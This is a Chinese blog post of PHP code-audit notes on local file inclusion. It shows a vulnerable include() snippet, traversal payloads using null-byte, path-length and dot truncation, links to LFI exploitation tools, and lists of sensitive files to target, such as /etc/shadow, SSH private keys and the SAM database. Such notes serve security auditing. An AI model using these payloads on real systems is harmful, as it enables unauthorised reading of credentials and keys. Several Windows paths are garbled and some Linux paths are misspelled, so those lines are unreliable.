zoukankan      html  css  js  c++  java
  • PHP代码审计笔记--文件包含漏洞

    有限制的本地文件包含:

    <?php
    include($_GET['file'].".php"); 
    ?>

    %00截断:

    ?file=C://Windows//win.ini%00    (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29-nts无效)

    ?file==../../../../../../../../../etc/passwd%00   (需要 magic_quotes_gpc=off,PHP小于5.3.4有效)

    路径长度截断:

    ?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.(php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256)

    点号截断:

    ?file=../../../../../../../../../boot.ini/………[…]…………(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256)

    文件包含漏洞利用工具

    LFISuite:https://github.com/D35m0nd142/LFISuite

    LFI Scan & Exploit Tool:https://github.com/P0cL4bs/Kadimus/

    window常见包含路径:

    C:oot.ini

    C:Windowswin.ini

    C:Windowssystem.ini

    Windows:

    C:oot.ini //查看系统版本
    C:WindowsSystem32inetsrvMetaBase.xml //IIS配置文件
    C:Windowsrepairsam //存储系统初次安装的密码
    C:Program Filesmysqlmy.ini //Mysql配置
    C:Program Filesmysqldatamysqluser.MYD //Mysql root
    C:Windowsphp.ini //php配置信息
    C:Windowsmy.ini //Mysql配置信息C:Windowswin.ini //Windows系统的一个基本系统配置文件

    Linux:

    /root/.ssh/authorized_keys
    /root/.ssh/id_rsa
    /root/.ssh/id_ras.keystore
    /root/.ssh/known_hosts //记录每个访问计算机用户的公钥
    /etc/passwd
    /etc/shadow
    /etc/my.cnf //mysql配置文件
    /etc/httpd/conf/httpd.conf //apache配置文件
    /root/.bash_history //用户历史命令记录文件
    /root/.mysql_history //mysql历史命令记录文件
    /proc/mounts //记录系统挂载设备
    /porc/config.gz //内核配置文件
    /var/lib/mlocate/mlocate.db //全文件路径
    /porc/self/cmdline //当前进程的cmdline参数

    最后

    欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

     http://blog.csdn.net/wangjian1012/article/details/51581440

    详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等)

    https://bbs.ichunqiu.com/thread-28688-1-1.html?from=sec

  • 相关阅读:
    .Net EF中DbContext动态生成DbSet
    .net core 3.0 中间件或过滤器中读取post请求body方法
    Asp.Net Core 5 WebAPI发布后的Swagger不显示问题
    .net Core 使用Swagger 让某些接口不显示在文档
    C# Request.InputStream 读取输入流为空的原因处理
    ASP.NET 中的缓存
    缓存依赖(文件、数据库)
    NLTK基本使用
    NLTK基本使用
    NLTK的基本使用
  • 原文地址:https://www.cnblogs.com/xiaozi/p/7793857.html
Copyright © 2011-2022 走看看